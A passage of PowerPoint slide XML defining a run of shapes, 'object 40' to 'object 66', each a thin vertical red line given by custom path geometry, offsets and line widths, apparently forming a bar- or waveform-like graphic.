            <a:pathLst>
              <a:path h="1517014">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="1516686"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="8606">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="40" name="object 40"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2433485" y="2104369"/>
            <a:ext cx="0" cy="3883264"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="1959610">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="1959261"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="5603">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="41" name="object 41"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2433485" y="2101395"/>
            <a:ext cx="0" cy="3889556"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="1962785">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="1962264"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="8606">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="42" name="object 42"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2453716" y="3498257"/>
            <a:ext cx="0" cy="2489014"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="1256030">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="1255865"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="6005">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="43" name="object 43"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2453716" y="3495281"/>
            <a:ext cx="0" cy="2495305"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="1259205">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="1258867"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="9007">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="44" name="object 44"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2473548" y="2609723"/>
            <a:ext cx="0" cy="3377406"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="1704339">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="1704245"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="6005">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="45" name="object 45"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2473548" y="2606748"/>
            <a:ext cx="0" cy="3383697"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="1707514">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="1707248"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="9007">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="46" name="object 46"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2493382" y="3986950"/>
            <a:ext cx="0" cy="2000774"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="1009650">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="1009256"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="6005">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="47" name="object 47"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2493382" y="3983974"/>
            <a:ext cx="0" cy="2007066"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="1012825">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="1012258"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="9007">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="48" name="object 48"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2513215" y="2737450"/>
            <a:ext cx="0" cy="3250314"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="1640205">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="1639790"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="6005">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="49" name="object 49"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2513215" y="2734475"/>
            <a:ext cx="0" cy="3256606"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="1643380">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="1642793"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="9007">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="50" name="object 50"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2533049" y="3837011"/>
            <a:ext cx="0" cy="2150518"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="1085214">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="1084920"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="6005">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="51" name="object 51"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2533049" y="3834033"/>
            <a:ext cx="0" cy="2156810"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="1088389">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="1087922"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="9007">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="52" name="object 52"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2552882" y="2804088"/>
            <a:ext cx="0" cy="3183622"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="1606550">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="1606162"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="6005">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="53" name="object 53"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2552882" y="2801115"/>
            <a:ext cx="0" cy="3189914"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="1609725">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="1609164"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="9007">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="54" name="object 54"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2572716" y="3798136"/>
            <a:ext cx="0" cy="2189527"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="1104900">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="1104536"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="6005">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="55" name="object 55"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2572716" y="3795161"/>
            <a:ext cx="0" cy="2195818"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="1108075">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="1107539"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="9007">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="56" name="object 56"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2592548" y="2931816"/>
            <a:ext cx="0" cy="3055270"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="1541780">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="1541707"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="6005">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="57" name="object 57"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2592548" y="2928842"/>
            <a:ext cx="0" cy="3061562"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="1544955">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="1544710"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="9007">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="58" name="object 58"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2612383" y="4009163"/>
            <a:ext cx="0" cy="1978122"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="998219">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="998046"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="6005">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="59" name="object 59"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2612383" y="4006188"/>
            <a:ext cx="0" cy="1984414"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="1001394">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="1001049"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="9007">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="60" name="object 60"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2632215" y="3026223"/>
            <a:ext cx="0" cy="2960894"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="1494155">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="1494067"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="6005">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="61" name="object 61"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2632215" y="3023247"/>
            <a:ext cx="0" cy="2967186"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="1497330">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="1497069"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="9007">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="62" name="object 62"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2652049" y="4192423"/>
            <a:ext cx="0" cy="1795662"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="906144">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="905568"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="6005">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="63" name="object 63"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2652049" y="4189448"/>
            <a:ext cx="0" cy="1800697"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="908685">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="908570"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="9007">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="64" name="object 64"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2672280" y="3087311"/>
            <a:ext cx="0" cy="2900494"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="1463675">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="1463241"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="5603">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="65" name="object 65"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2672280" y="3084334"/>
            <a:ext cx="0" cy="2906785"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="1466850">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="1466243"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="8606">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="66" name="object 66"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2692114" y="4086908"/>
            <a:ext cx="0" cy="1900106"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="958850">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="958813"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="5603">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
